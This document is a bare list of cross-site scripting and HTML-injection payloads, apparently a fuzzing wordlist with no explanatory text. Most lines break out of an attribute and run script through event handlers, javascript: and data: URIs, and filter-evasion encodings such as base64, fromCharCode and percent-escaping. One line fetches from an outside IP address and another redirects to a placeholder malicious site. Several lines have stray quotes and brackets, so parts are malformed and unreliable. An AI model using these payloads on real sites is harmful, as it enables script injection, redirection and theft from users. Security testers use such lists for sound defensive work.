"><body onresize=eval(atob('YWxlcnQoMSk='))><h1>hi</h1></body>
"><marquee onstart=eval(atob('YWxlcnQoMSk='))><h1>hi</h1></marquee>
"><embed src=javascript:eval(atob('YWxlcnQoMSk='))><h1>hi</h1></embed>
"><object data=javascript:eval(atob('YWxlcnQoMSk='))><h1>hi</h1></object>
"><bgsound src=javascript:eval(atob('YWxlcnQoMSk='))><h1>hi</h1></bgsound>
"><base href=javascript:eval(atob('YWxlcnQoMSk='))><h1>hi</h1></base>
"><link rel=stylesheet href=javascript:eval(atob('YWxlcnQoMSk='))><h1>hi</h1></link>
"><style>@import 'javascript:eval(atob('YWxlcnQoMSk='))';</style><h1>hi</h1>
"><isindex action=javascript:eval(atob('YWxlcnQoMSk='))><h1>hi</h1></isindex>
"><xmp><img src=1 onerror=eval(atob('YWxlcnQoMSk='))></xmp><h1>hi</h1>
"><noscript><p title=eval(atob('YWxlcnQoMSk='))></noscript><h1>hi</h1>
"><plaintext><img src=1 onerror=eval(atob('YWxlcnQoMSk='))><h1>hi</h1>
"><svg/onload=eval(atob('YWxlcnQoMSk='))>//<h1>hi</h1>
"><!--<svg/onload=eval(atob('YWxlcnQoMSk='))>--><h1>hi</h1>
"><!--<img src=1 onerror=eval(atob('YWxlcnQoMSk='))>--><h1>hi</h1>
"><form action=javascript:eval(atob('YWxlcnQoMSk='))><h1>hi</h1></form>
"><button onclick=eval(atob('YWxlcnQoMSk='))><h1>hi</h1></button>
"><keygen autofocus onfocus=eval(atob('YWxlcnQoMSk='))><h1>hi</h1></keygen>
"><svg/onload=fetch('http://10.17.30.252:8000')><h1>hi</h1>
"><img src=x onerror=eval(String.fromCharCode(97,108,101,114,116,40,49,41))><h1>hi</h1>
"><iframe src=javascript:alert(1)><h1>hi</h1></iframe>
"><script src=data:,alert(1)><h1>hi</h1></script>
"><details open ontoggle=confirm(1)><h1>hi</h1></details>
"><input autofocus onfocus=alert(1)><h1>hi</h1></input>
"><select autofocus onfocus=alert(1)><h1>hi</h1><option></select>
"><textarea autofocus onfocus=alert(1)><h1>hi</h1></textarea>
"><svg/onload=location.href='http://your-malicious-site.com'><h1>hi</h1>
"><math><mtext><title>alert(1)</title></mtext></math><h1>hi</h1>
"><audio src onerror=alert(1)><h1>hi</h1></audio>
"><video src onerror=alert(1)><h1>hi</h1></video>
"><body onresize=alert(1)><h1>hi</h1></body>
"><marquee onstart=alert(1)><h1>hi</h1></marquee>
"><embed src=javascript:alert(1)><h1>hi</h1></embed>
"><object data=javascript:alert(1)><h1>hi</h1></object>
"><bgsound src=javascript:alert(1)><h1>hi</h1></bgsound>
"><base href=javascript:alert(1)><h1>hi</h1></base>
"><link rel=stylesheet href=javascript:alert(1)><h1>hi</h1></link>
"><style>@import 'javascript:alert(1)';</style><h1>hi</h1>
"><isindex action=javascript:alert(1)><h1>hi</h1></isindex>
"><xmp><img src=1 onerror=alert(1)></xmp><h1>hi</h1>
"><noscript><p title=alert(1)></noscript><h1>hi</h1>
"><plaintext><img src=1 onerror=alert(1)><h1>hi</h1>
"><svg/onload=alert(1)//><h1>hi</h1>
"><!--<svg/onload=alert(1)>--><h1>hi</h1>
"><!--<img src=1 onerror=alert(1)>--><h1>hi</h1>
"><form action=javascript:alert(1)><h1>hi</h1></form>
"><button onclick=alert(1)><h1>hi</h1></button>
"><keygen autofocus onfocus=alert(1)><h1>hi</h1></keygen>
'';><svg/onload=alert(1)><h1>hello</h1>
'';><img src=x onerror=alert(1)><h1>hello</h1>
'';><iframe src="javascript:alert(1)"></iframe><h1>hello</h1>
'';><object data="data:text/html,<h1>hello</h1>"></object>
'';><a href="javascript:alert(1)"><h1>hello</h1></a>
'';><base href="javascript:alert(1)"><h1>hello</h1>
'';><meta http-equiv="refresh" content="0;url=javascript:alert(1)"><h1>hello</h1>
'';><style>@import 'data:text/html,<h1>hello</h1>'</style>
'';><script>document.write('<h1>hello</h1>');</script>
'';><h1 onmouseover="alert(1)">hello</h1>
'';><h1 id="test"></h1><script>document.getElementById('test').innerHTML='<h1>hello</h1>'</script>
'';><svg/onload="document.body.innerHTML='<h1>hello</h1>'"></svg>
'';><div style="background-image:url(javascript:alert(1))"><h1>hello</h1></div>
'';><xss><h1>hello</h1>
'';><h1>hello</h1><script>alert(1)</script>
'';><iframe src="data:text/html,<h1>hello</h1>"></iframe>
'';><img src="data:image/svg+xml,<svg/onload=document.write('<h1>hello</h1>')>">
'';><h1>hello</h1><svg/onload="document.body.innerHTML='<h1>hello</h1>'"></svg>
'';><script>document.write('<h1>hello</h1>')</script>
'';><a href="javascript:document.write('<h1>hello</h1>')"><h1>hello</h1></a>
'';><meta http-equiv="refresh" content="0;url=data:text/html,<h1>hello</h1>">
'';><object data="data:text/html,<h1>hello</h1>"></object>
'';><h1>hello</h1><iframe src="javascript:alert(1)"></iframe>
'';><svg/onload="document.body.innerHTML='<h1>hello</h1>'"></svg>
'';><a href="data:text/html,<h1>hello</h1>"><h1>hello</h1></a>
'';><style>@keyframes x{from{opacity:0;}to{opacity:1;}}h1{animation:x 1s;}</style><h1>hello</h1>
'';><h1>hello</h1><script>eval('document.write("<h1>hello</h1>")')</script>
'';><h1>hello</h1><object data="javascript:alert(1)"></object>
'';><h1>hello</h1><img src="x" onerror="document.write('<h1>hello</h1>')">
'';><h1>hello</h1><div style="display:none"><script>document.write('<h1>hello</h1>')</script></div>
'';><svg/onload=alert(1)><h1>hello</h1>
'';><img src=x onerror=alert(1)><h1>hello</h1>
'';><iframe src="javascript:alert(1)"></iframe><h1>hello</h1>
'';><object data="data:text/html,<h1>hello</h1>"></object>
'';><a href="javascript:alert(1)"><h1>hello</h1></a>
'';><base href="javascript:alert(1)"><h1>hello</h1>
'';><meta http-equiv="refresh" content="0;url=javascript:alert(1)"><h1>hello</h1>
'';><style>@import 'data:text/html,<h1>hello</h1>'</style>
'';><script>document.write('<h1>hello</h1>');</script>
'';><h1 onmouseover="alert(1)">hello</h1>
'';><h1 id="test"></h1><script>document.getElementById('test').innerHTML='<h1>hello</h1>'</script>
'';><svg/onload="document.body.innerHTML='<h1>hello</h1>'"></svg>
'';><div style="background-image:url(javascript:alert(1))"><h1>hello</h1></div>
'';><xss><h1>hello</h1>
'';><h1>hello</h1><script>alert(1)</script>
'';><iframe src="data:text/html,<h1>hello</h1>"></iframe>
'';><img src="data:image/svg+xml,<svg/onload=document.write('<h1>hello</h1>')>">
'';><h1>hello</h1><svg/onload="document.body.innerHTML='<h1>hello</h1>'"></svg>
'';><script>document.write('<h1>hello</h1>')</script>
'';><a href="javascript:document.write('<h1>hello</h1>')"><h1>hello</h1></a>
'';><meta http-equiv="refresh" content="0;url=data:text/html,<h1>hello</h1>">
'';><object data="data:text/html,<h1>hello</h1>"></object>
'';><h1>hello</h1><iframe src="javascript:alert(1)"></iframe>
'';><svg/onload="document.body.innerHTML='<h1>hello</h1>'"></svg>
'';><a href="data:text/html,<h1>hello</h1>"><h1>hello</h1></a>
'';><style>@keyframes x{from{opacity:0;}to{opacity:1;}}h1{animation:x 1s;}</style><h1>hello</h1>
'';><h1>hello</h1><script>eval('document.write("<h1>hello</h1>")')</script>
'';><h1>hello</h1><object data="javascript:alert(1)"></object>
'';><h1>hello</h1><img src="x" onerror="document.write('<h1>hello</h1>')">
'';><h1>hello</h1><div style="display:none"><script>document.write('<h1>hello</h1>')</script></div>
'';><svg/onload=eval('document.write("<h1>hello</h1>")')>
'';><img src=x onerror=eval('document.write("<h1>hello</h1>")')>
'';><iframe src="javascript:eval('document.write(\"<h1>hello</h1>\")')"></iframe>
'';><object data="data:text/html,<h1>hello</h1>"></object>
'';><a href="javascript:void(0);eval('document.write(\"<h1>hello</h1>\")')"><h1>hello</h1></a>
'';><base href="javascript:eval('document.write(\"<h1>hello</h1>\")')"><h1>hello</h1>
'';><meta http-equiv="refresh" content="0;url=javascript:eval('document.write(\"<h1>hello</h1>\")')"><h1>hello</h1>
'';><style>@import 'data:text/html,<h1>hello</h1>'</style>
'';><script>eval('document.write("<h1>hello</h1>")');</script>
'';><h1 onmouseover="eval('document.write(\"<h1>hello</h1>\")')">hello</h1>
'';><h1 id="x"></h1><script>document.getElementById('x').innerHTML='<h1>hello</h1>'</script>
'';><svg/onload="eval('document.body.innerHTML=\"<h1>hello</h1>\"')"></svg>
'';><div style="background-image:url(javascript:eval('document.write(\"<h1>hello</h1>\")'))"><h1>hello</h1></div>
'';><xss><h1>hello</h1>
'';><h1>hello</h1><script>eval('document.write("<h1>hello</h1>")')</script>
'';><iframe src="data:text/html,<h1>hello</h1>"></iframe>
'';><img src="data:image/svg+xml,<svg/onload=eval('document.write(\"<h1>hello</h1>\")')>">
'';><h1>hello</h1><svg/onload="eval('document.body.innerHTML=\"<h1>hello</h1>\"')"></svg>
'';><script>eval('document.write("<h1>hello</h1>")')</script>
'';><a href="javascript:eval('document.write(\"<h1>hello</h1>\")')"><h1>hello</h1></a>
'';><meta http-equiv="refresh" content="0;url=data:text/html,<h1>hello</h1>">
'';><object data="data:text/html,<h1>hello</h1>"></object>
'';><h1>hello</h1><iframe src="javascript:eval('document.write(\"<h1>hello</h1>\")')"></iframe>
'';><svg/onload="eval('document.body.innerHTML=\"<h1>hello</h1>\"')"></svg>
'';><a href="data:text/html,<h1>hello</h1>"><h1>hello</h1></a>
'';><style>@keyframes x{from{opacity:0;}to{opacity:1;}}h1{animation:x 1s;}</style><h1>hello</h1>
'';><h1>hello</h1><script>eval('document.write(\"<h1>hello</h1>\")')</script>
'';><h1>hello</h1><object data="javascript:eval('document.write(\"<h1>hello</h1>\")')"></object>
'';><h1>hello</h1><img src="x" onerror="eval('document.write(\"<h1>hello</h1>\")')">
'';><h1>hello</h1><div style="display:none"><script>eval('document.write(\"<h1>hello</h1>\")')</script></div>
'';><svg/onload="eval(String.fromCharCode(100, 111, 99, 117, 109, 101, 110, 116, 46, 119, 114, 105, 116, 101, 40, 34, 60, 104, 49, 62, 104, 101, 108, 108, 111, 60, 47, 104, 49, 62, 34))"></svg>
'';><img src=x onerror="eval(String.fromCharCode(100, 111, 99, 117, 109, 101, 110, 116, 46, 119, 114, 105, 116, 101, 40, 34, 60, 104, 49, 62, 104, 101, 108, 108, 111, 60, 47, 104, 49, 62, 34))")>
'';><iframe src="javascript:eval(String.fromCharCode(100, 111, 99, 117, 109, 101, 110, 116, 46, 119, 114, 105, 116, 101, 40, 34, 60, 104, 49, 62, 104, 101, 108, 108, 111, 60, 47, 104, 49, 62, 34))")"></iframe>
'';><object data="data:text/html,<svg/onload='eval(String.fromCharCode(100, 111, 99, 117, 109, 101, 110, 116, 46, 119, 114, 105, 116, 101, 40, 34, 60, 104, 49, 62, 104, 101, 108, 108, 111, 60, 47, 104, 49, 62, 34))')"></svg>"></object>
'';><a href="javascript:void(eval(String.fromCharCode(100, 111, 99, 117, 109, 101, 110, 116, 46, 119, 114, 105, 116, 101, 40, 34, 60, 104, 49, 62, 104, 101, 108, 108, 111, 60, 47, 104, 49, 62, 34))"))"><h1>hello</h1></a>
'';><base href="javascript:void(eval(String.fromCharCode(100, 111, 99, 117, 109, 101, 110, 116, 46, 119, 114, 105, 116, 101, 40, 34, 60, 104, 49, 62, 104, 101, 108, 108, 111, 60, 47, 104, 49, 62, 34))"))"><h1>hello</h1>
'';><meta http-equiv="refresh" content="0;url=javascript:void(eval(String.fromCharCode(100, 111, 99, 117, 109, 101, 110, 116, 46, 119, 114, 105, 116, 101, 40, 34, 60, 104, 49, 62, 104, 101, 108, 108, 111, 60, 47, 104, 49, 62, 34))"))"><h1>hello</h1>
'';><style>@import url("data:text/html,<h1>hello</h1>")</style>
'';><script>eval(String.fromCharCode(100, 111, 99, 117, 109, 101, 110, 116, 46, 119, 114, 105, 116, 101, 40, 34, 60, 104, 49, 62, 104, 101, 108, 108, 111, 60, 47, 104, 49, 62, 34))");</script>
'';><h1 onmouseover="eval(String.fromCharCode(100, 111, 99, 117, 109, 101, 110, 116, 46, 119, 114, 105, 116, 101, 40, 34, 60, 104, 49, 62, 104, 101, 108, 108, 111, 60, 47, 104, 49, 62, 34))")">hello</h1>
'';><h1 id="x"></h1><script>document.getElementById('x').innerHTML='<h1>hello</h1>'</script>
'';><svg/onload="eval(unescape('%64%6F%63%75%6D%65%6E%74%2E%77%72%69%74%65%28%27%3C%68%31%3E%68%65%6C%6C%6F%3C%2F%68%31%3E%27%29'))"></svg>
'';><svg/onload=eval(String.fromCharCode(100,111,99,117,109,101,110,116,46,119,114,105,116,101,40,39,60,104,49,62,104,101,108,108,111,60,47,104,49,62,39))"></svg>
'';><img src=x onerror=eval(String.fromCharCode(100,111,99,117,109,101,110,116,46,119,114,105,116,101,40,39,60,104,49,62,104,101,108,108,111,60,47,104,49,62,39))")>
'';><iframe src=javascript:eval(String.fromCharCode(100,111,99,117,109,101,110,116,46,119,114,105,116,101,40,39,60,104,49,62,104,101,108,108,111,60,47,104,49,62,39))")"></iframe>
'';><object data="data:text/html,<svg/onload=eval(String.fromCharCode(100,111,99,117,109,101,110,116,46,119,114,105,116,101,40,39,60,104,49,62,104,101,108,108,111,60,47,104,49,62,39))')"></svg>"></object>
'';><a href="javascript:void(eval(String.fromCharCode(100,111,99,117,109,101,110,116,46,119,114,105,116,101,40,39,60,104,49,62,104,101,108,108,111,60,47,104,49,62,39))"))"><h1>hello</h1></a>
'';><base href="javascript:void(eval(String.fromCharCode(100,111,99,117,109,101,110,116,46,119,114,105,116,101,40,39,60,104,49,62,104,101,108,108,111,60,47,104,49,62,39))"))"><h1>hello</h1>
'';><meta http-equiv="refresh" content="0;url=javascript:void(eval(String.fromCharCode(100,111,99,117,109,101,110,116,46,119,114,105,116,101,40,39,60,104,49,62,104,101,108,108,111,60,47,104,49,62,39))"))"><h1>hello</h1>
'';><style>@import url('data:text/html,<h1>hello</h1>')</style>
'';><script>eval(String.fromCharCode(100,111,99,117,109,101,110,116,46,119,114,105,116,101,40,39,60,104,49,62,104,101,108,108,111,60,47,104,49,62,39))');</script>
'';><h1 onmouseover=eval(String.fromCharCode(100,111,99,117,109,101,110,116,46,119,114,105,116,101,40,39,60,104,49,62,104,101,108,108,111,60,47,104,49,62,39))")">hello</h1>
'';><h1 id="x"></h1><script>document.getElementById('x').innerHTML='<h1>hello</h1>'</script>
'';><svg/onload=eval(unescape('%64%6F%63%75%6D%65%6E%74%2E%77%72%69%74%65%28%27%3C%68%31%3E%68%65%6C%6C%6F%3C%2F%68%31%3E%27%29'))"></svg>
'';><svg/onload=eval(decodeURIComponent('%64%6F%63%75%6D%65%6E%74%2E%77%72%69%74%65%28%27%3C%68%31%3E%68%65%6C%6C%6F%3C%2F%68%31%3E%27%29'))"></svg>
'';><img src=x onerror="eval(String.fromCharCode(100,111,99,117,109,101,110,116,46,119,114,105,116,101,40,39,60,104,49,62,104,101,108,108,111,60,47,104,49,62,39))")>
'';><iframe src="data:text/html,<svg/onload=eval(unescape('%64%6F%63%75%6D%65%6E%74%2E%77%72%69%74%65%28%27%3C%68%31%3E%68%65%6C%6C%6F%3C%2F%68%31%3E%27%29'))"></svg>"></iframe>
'';><base href="javascript:eval(unescape('%64%6F%63%75%6D%65%6E%74%2E%77%72%69%74%65%28%27%3C%68%31%3E%68%65%6C%6C%6F%3C%2F%68%31%3E%27%29'))"><h1>hello</h1>
'';><meta http-equiv="refresh" content="0;url=data:text/html,<svg/onload=eval(unescape('%64%6F%63%75%6D%65%6E%74%2E%77%72%69%74%65%28%27%3C%68%31%3E%68%65%6C%6C%6F%3C%2F%68%31%3E%27%29'))"></svg>">
'';><style>@import url('data:text/html,<svg/onload=eval(unescape('%64%6F%63%75%6D%65%6E%74%2E%77%72%69%74%65%28%27%3C%68%31%3E%68%65%6C%6C%6F%3C%2F%68%31%3E%27%29'))"></svg>')</style>
'';><script>eval(decodeURIComponent('%64%6F%63%75%6D%65%6E%74%2E%77%72%69%74%65%28%27%3C%68%31%3E%68%65%6C%6C%6F%3C%2F%68%31%3E%27%29'))</script>
'';><h1 onmouseover="eval(unescape('%64%6F%63%75%6D%65%6E%74%2E%77%72%69%74%65%28%27%3C%68%31%3E%68%65%6C%6C%6F%3C%2F%68%31%3E%27%29'))">hello</h1>
'';><h1 id="x"></h1><script>document.getElementById('x').innerHTML=decodeURIComponent('%3C%68%31%3E%68%65%6C%6C%6F%3C%2F%68%31%3E')</script>
'';><svg/onload=eval(decodeURIComponent('%64%6F%63%75%6D%65%6E%74%2E%77%72%69%74%65%28%27%3C%68%31%3E%68%65%6C%6C%6F%3C%2F%68%31%3E%27%29'))"></svg>
'';><iframe src="javascript:eval(decodeURIComponent('%64%6F%63%75%6D%65%6E%74%2E%77%72%69%74%65%28%27%3C%68%31%3E%68%65%6C%6C%6F%3C%2F%68%31%3E%27%29'))"></iframe>
'';><img src="data:image/svg+xml,<svg/onload=eval(decodeURIComponent('%64%6F%63%75%6D%65%6E%74%2E%77%72%69%74%65%28%27%3C%68%31%3E%68%65%6C%6C%6F%3C%2F%68%31%3E%27%29'))"></svg>">
'';><h1>hello</h1><svg/onload="eval(unescape('%64%6F%63%75%6D%65%6E%74%2E%77%72%69%74%65%28%27%3C%68%31%3E%68%65%6C%6C%6F%3C%2F%68%31%3E%27%29'))"></svg>
'';><h1>hello</h1><iframe src="javascript:eval(unescape('%64%6F%63%75%6D%65%6E%74%2E%77%72%69%74%65%28%27%3C%68%31%3E%68%65%6C%6C%6F%3C%2F%68%31%3E%27%29'))"></iframe>
'';><h1>hello</h1><object data="data:text/html,<svg/onload=eval(decodeURIComponent('%64%6F%63%75%6D%65%6E%74%2E%77%72%69%74%65%28%27%3C%68%31%3E%68%65%6C%6C%6F%3C%2F%68%31%3E%27%29'))"></svg>"></object>
'';><h1>hello</h1><div style="display:none"><script>eval(String.fromCharCode(100,111,99,117,109,101,110,116,46,119,114,105,116,101,40,39,60,104,49,62,104,101,108,108,111,60,47,104,49,62,39))")</script></div>
'';><h1>hello</h1><style>@keyframes x{from{opacity:0;}to{opacity:1;}}h1{animation:x 1s;}</style><script>eval(decodeURIComponent('%64%6F%63%75%6D%65%6E%74%2E%77%72%69%74%65%28%27%3C%68%31%3E%68%65%6C%6C%6F%3C%2F%68%31%3E%27%29'))</script>
'';><h1>hello</h1><div style="background:url('data:text/html,<h1>hello</h1>')"></div>
&quot;&lt;h1&gt;hi&lt;/h1&gt;
&#34;&lt;h1&gt;hi&lt;/h1&gt;
&#x22;&lt;h1&gt;hi&lt;/h1&gt;
\u0022<h1>hi</h1>
\x22<h1>hi</h1>
&QUOT;&lt;h1&gt;hi&lt;/h1&gt;
\u0022<h1>hi</h1>
&#x000022;&lt;h1&gt;hi&lt;/h1&gt;
&#034;&lt;h1&gt;hi&lt;/h1&gt;
&#34;&lt;h1&gt;hi&lt;/h1&gt;
&quot; <h1>hi</h1>
&#x22; <h1>hi</h1>
&QUOT; <h1>hi</h1>
\x22 <h1>hi</h1>
&#034; <h1>hi</h1>
&#34; <h1>hi</h1>
&#x22; <h1>hi</h1>
&quot;&lt;h1&gt;hi&lt;/h1&gt;
\u0022<h1>hi</h1>
\x22<h1>hi</h1>
&#x000022;<h1>hi</h1>
&#034;<h1>hi</h1>
&#34;<h1>hi</h1>
&quot;<h1>hi</h1>
\u0022 <h1>hi</h1>
\x22 <h1>hi</h1>
&#x22; <h1>hi</h1>
&#034; <h1>hi</h1>
&#34; <h1>hi</h1>
&quot; <h1>hi</h1>
